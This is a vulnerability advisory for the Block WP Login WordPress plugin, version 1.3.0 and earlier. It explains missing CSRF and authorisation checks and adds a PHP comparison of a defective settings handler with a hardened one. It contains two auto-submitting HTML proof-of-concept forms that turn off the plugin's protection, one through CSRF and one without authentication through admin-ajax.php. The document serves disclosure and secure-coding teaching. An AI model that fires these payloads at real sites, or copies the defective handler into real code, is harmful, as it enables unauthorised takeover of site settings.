Block WP Login <= 1.3.0 - CSRF and Unauthorised Settings Update



Description
Lack of CSRF and authorisation checks in the bwpl_configure_slug() function, registered as an admin_init action, could allow an attacker (via CSRF, or unauthenticated via admin-ajax.php, since admin_init also fires for that endpoint) to change the plugin settings (located at /wp-admin/options-permalink.php) and disable the protection offered.

v1.3.1 added a nonce check, but not authorisation checks; the vendor was contacted about it.
v1.3.2 added the authorisation checks.
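The following is an added illustration, not the plugin's own code, of the two checks the description says were missing from an admin_init settings handler. It places a minimal handler with the same two defects beside a hardened version. Only the bwpl_* option names and the admin_init hook come from the advisory; the function names, the nonce action and nonce field name, and the form markup are assumptions.

```php
<?php
// Added example (not Block WP Login's own code). Option names bwpl_* come from
// the advisory; function names, nonce action/field names and the form are assumed.

// Defective pattern: admin_init runs on every request to /wp-admin/, including
// unauthenticated requests to admin-ajax.php, so with neither a nonce nor a
// capability check any POST carrying these fields is honoured.
function bwpl_configure_slug_defective() {
    if ( ! isset( $_POST['bwpl_slug'] ) ) {
        return;
    }
    bwpl_store_settings_from_post();
}

// Hardened pattern: check who is asking before checking that the request
// was issued by this site's own form. Either check alone is insufficient:
// a nonce proves the request came from a form the site issued to this user,
// not that the user is authorised to change options.
function bwpl_configure_slug_hardened() {
    if ( ! isset( $_POST['bwpl_slug'] ) ) {
        return;
    }
    // Authorisation: only users who may manage options may change them.
    // This also stops the unauthenticated admin-ajax.php path outright.
    if ( ! current_user_can( 'manage_options' ) ) {
        return;
    }
    // CSRF: require the nonce issued by the settings form (names assumed).
    // check_admin_referer() terminates the request if the nonce is invalid.
    check_admin_referer( 'bwpl_save_settings', 'bwpl_nonce' );
    bwpl_store_settings_from_post();
}
add_action( 'admin_init', 'bwpl_configure_slug_hardened' );

// Shared storage helper (assumed): coerce the boolean toggles explicitly so
// arbitrary string values cannot be stored, and sanitise the slug.
function bwpl_store_settings_from_post() {
    update_option( 'bwpl_slug', sanitize_text_field( wp_unslash( $_POST['bwpl_slug'] ) ) );
    foreach ( array( 'bwpl_ajax', 'bwpl_cron', 'bwpl_xmlrpc', 'bwpl_robots' ) as $toggle ) {
        $enabled = isset( $_POST[ $toggle ] ) && 'true' === $_POST[ $toggle ];
        update_option( $toggle, $enabled ? 'true' : 'false' );
    }
}

// The settings form must emit the matching nonce field so legitimate saves
// pass check_admin_referer() (assumed form; rendered inside the form markup).
function bwpl_render_settings_nonce() {
    wp_nonce_field( 'bwpl_save_settings', 'bwpl_nonce' );
}
```

The capability check is deliberately placed before the nonce check: check_admin_referer() ends the request with an error page on failure, and a handler that only verifies the nonce (the state the description attributes to v1.3.1) still accepts a correctly-nonced request from any logged-in user who can obtain one.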
Proof of Concept
Settings Update via CSRF:

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://<BLOG>/wp-admin/options-permalink.php" method="POST">
      <input type="hidden" name="bwpl_slug" value="" />
      <input type="hidden" name="bwpl_ajax" value="" />
      <input type="hidden" name="bwpl_cron" value="" />
      <input type="hidden" name="bwpl_xmlrpc" value="" />
      <input type="hidden" name="bwpl_robots" value="true" />
    </form>
  </body>
</html>

Settings Update as Unauthenticated using admin-ajax.php:

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="a" />
      <input type="hidden" name="bwpl_slug" value="" />
      <input type="hidden" name="bwpl_ajax" value="" />
      <input type="hidden" name="bwpl_cron" value="" />
      <input type="hidden" name="bwpl_xmlrpc" value="true" />
      <input type="hidden" name="bwpl_robots" value="" />
    </form>
  </body>
</html>


Affects Plugin

Fixed in version 1.3.2

References

URL https://plugins.trac.wordpress.org/changeset?reponame=&new=2113620%40block-wp-login&old=2042772%40block-wp-login

Classification

Type MULTI

Miscellaneous

Verified Yes
WPVDB ID 9401

Timeline

Publicly Published 2019-06-27
Added 2019-06-27
Last Updated 2019-06-28
